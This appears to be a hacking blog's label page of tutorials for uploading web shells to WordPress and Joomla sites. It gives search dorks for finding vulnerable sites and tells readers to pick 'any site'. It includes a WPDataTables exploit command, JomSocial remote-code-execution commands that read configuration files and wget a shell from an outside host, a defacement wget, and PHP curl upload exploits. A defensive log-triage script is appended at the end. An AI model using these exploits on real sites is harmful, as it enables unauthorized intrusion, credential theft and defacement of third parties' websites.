Showing posts with the label Upload Shell. Show all posts
Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass
Uploading Shell
Requirement:
1-Python Any Version (v2.7 recommended)
2-Exploit Script
3-Backdoor
Steps:
1- Download Exploit
wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt
2- Change to executable Python extension
mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py
3- Find Vulnerable Target using dork
inurl:/plugins/wpdatatables
inurl:codecanyon-3958969
index of "wpdatatables"
index of "codecanyon-3958969"
4- Open cmd/terminal and run exploit wptable.py
python wpdatatables_shell_up.py -t targetsite.com -f shell.php
5- Shell Upload to
http://targetsite.com/wp-content/YEAR/MONTH/shell.php
Bypassing Not Acceptable
Requirements:
1- Weevely Stealth Shell
2- Remote Deface Script (.txt)
Steps:
1- Upload weevely stealth shell using the exploit script
2- Backconnect using weevely
3- CD to root directory
4- Backup index.php
mv index.php indexBAK.php
5- Import Deface Script
wget http://yourhosting.com/index.txt -O index.php
[JOOMLA] JomSocial 2.6 Remote Code Execution
Dork:
inurl:/index.php?option=com_community
Procedure
1- Copy the dork and paste it on Google or any other search engine
2- Choose any site
3- Run the JomSocial Exploiter by Gothie
4- Paste the site URL in the given textbox and click Connect
5- If the site is vulnerable, you will get the message as below
6- Now, you can execute any command remotely. The commands are as below:
system('id & uname -a');
system('ls');
system('cat configuration.php');
7- To upload a shell, you need to have a raw shell (shell.txt) uploaded somewhere it can be accessed directly without being executed. Type in the command below to import your shell and save it as .php
system('wget http://socialmediasuccesstools.com/shell.txt -O shell.php');
8- Your shell can be found at http://victim.com/shell.php
Downloads
JomSocial Exploiter by Gothie (2.7MB)
Wordpress 0day Exploiter [Original]
Wordpress 0day Exploiter
Wordpress 0day Exploiter is a tool that enables you to register as a new admin on a WordPress site which has the bug in the Ajax.php file.
How to create dorks?
It's very easy to create the dorks; the list of vulnerable themes is already provided in the rich text box on the right. So, you just need to add the theme name.
Dork:
inurl:/wp-content/themes/[theme_name]
Example:
inurl:/wp-content/themes/appius
How to use the tools?
It's easy, once you have found your target,
1- Simply paste the site URL, theme name, and your email in the textbox
2- Click on Confirm > Exploit
3- If your target is vulnerable, the "Register" button will be enabled
4- Click on Register and the webbrowser will bring you to the registration page
5- Enter your username and email
6- Check your email inbox for the confirmation and the password for your account.
7- Login to the site and there you go :)
8- You also can upload shell into the site. [How to upload shell in Wordpress site]
Download / Mirror
Exploit Elfinder - Shell Upload Vulnerability
Dork:
inurl:/elfinder/ intitle:index of
Steps:
1- Copy the dork and paste in google
2- Choose any site
3- Look for elfinder.html or elfinder.php.html
4- Upload your file
5- If your file is successfully uploaded, it will be in the same directory. Double click on your file to see its result
That's all :)
Exploit Joomla!: JCE
It has been a very long time since I last posted here, so today I'm going to post a new tutorial on how to upload a shell with the JCE method.
Thing Required:
JCE Exploiter : DOWNLOAD
DORKS:
inurl:"images/stories" php
"index of /images/stories/powered_by.png"
"index of /images/stories/joomla-dev_cycle.png"
"index of /images/stories/food"
"index of /images/stories/fruit"
inurl:"/images/stories/food"
inurl:"/images/stories/fruit"
inurl:index.php?option=com_jce
inurl:index.php?option=com_virtuemart
inurl:joomla/index.php?option=com_virtuemart
Steps:
1- Copy any of the dorks, and paste on google
2 - Choose any site
3 - Open up JCE.exe
4 - Paste the site that you chose in the textbox
5 - Click on START
6 - If the shell is successfully uploaded, you will get the link to the shell
7 - Go to the given url, and upload your shell
Video
Video by Tentera Siber Legion
Exploit Wordpress: Echea Theme - File Upload Vulnerability
Dork: inurl:/wp-content/themes/echea/
Shell Uploaded to:
http://www.site.com/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg
Exploit:
This exploit is the same as my previous post, so check it! :P
$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability
Things Required:
-XAMPP
-Shell
-Exploit script.php
Dork: inurl/wp-content/plugins/complete-gallery-manager
Shell Uploaded to : http://wordpress.com/wp-content/2013/09/up.php
Exploit :
Just watch the video if you still don't understand :)
$uploadfile="up.php";
$ch =
curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Exploit Wordpress: Salespresspro Theme - File Upload Vulnerability
POC:
Dork: inurl:/themes/salespresspro
inurl:/wp-content/themes/salespresspro/
Exploit: /wp-content/themes/salespresspro/headerimgbgblog-upload.php
This exploit is the same as the previous exploit that I posted, please check them if you can't understand.
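From the defender's side, the upload locations and handler scripts named in the posts above leave a recognisable trail in web server access logs: a POST to an upload script bundled inside a theme or plugin, followed by a request for a PHP-named file in a directory that should only hold static uploads. The following is an added example, not part of the original posts; the path patterns are assumptions generalised from the paths shown on this page, and the log lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload locations named on this page; requests there should only fetch static files.
UPLOAD_DIRS = re.compile(
    r"/wp-content/(?:uploads/|\d{4}/\d{2}/)|/uploaded/|/images/stories/", re.I)
# PHP-family extension anywhere in the file name: shell.php, custom_shell.php.jpg
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar)(?:\.|$)", re.I)
# Upload handler scripts shipped inside a theme or plugin directory
BUNDLED_UPLOADER = re.compile(
    r"/wp-content/(?:themes|plugins)/.*upload[^/]*\.php$", re.I)
# Combined log format: client ip ... "METHOD target HTTP/x.y" status
LOG_LINE = re.compile(r'^(\S+) .*?"(GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def suspicious_hits(lines):
    """Return (ip, method, path, status, reason) tuples for triage."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log request line
        ip, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # drop query string, decode %xx
        name = path.rsplit("/", 1)[-1]
        if UPLOAD_DIRS.search(path) and SCRIPT_EXT.search(name):
            reason = "script file requested from upload directory"
        elif method == "POST" and BUNDLED_UPLOADER.search(path):
            reason = "POST to bundled upload handler"
        else:
            continue
        hits.append((ip, method, path, int(status), reason))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2013:10:01:02 +0000] "POST /wp-content/themes/echea/js/uploadify/uploadify.php HTTP/1.1" 200 31',
    '203.0.113.7 - - [12/Sep/2013:10:01:09 +0000] "GET /wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Sep/2013:10:02:00 +0000] "GET /wp-content/2013/09/photo.jpg HTTP/1.1" 200 48211',
    '198.51.100.9 - - [12/Sep/2013:10:03:00 +0000] "GET /wp-content/2013/09/up.php HTTP/1.1" 404 162',
]

if __name__ == "__main__":
    for hit in suspicious_hits(SAMPLE_LOG):
        print(hit)
```

A 200 status on a script file in an upload directory means the server returned something for that path and should be reviewed first; a 404 usually indicates probing for a file that was never written.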

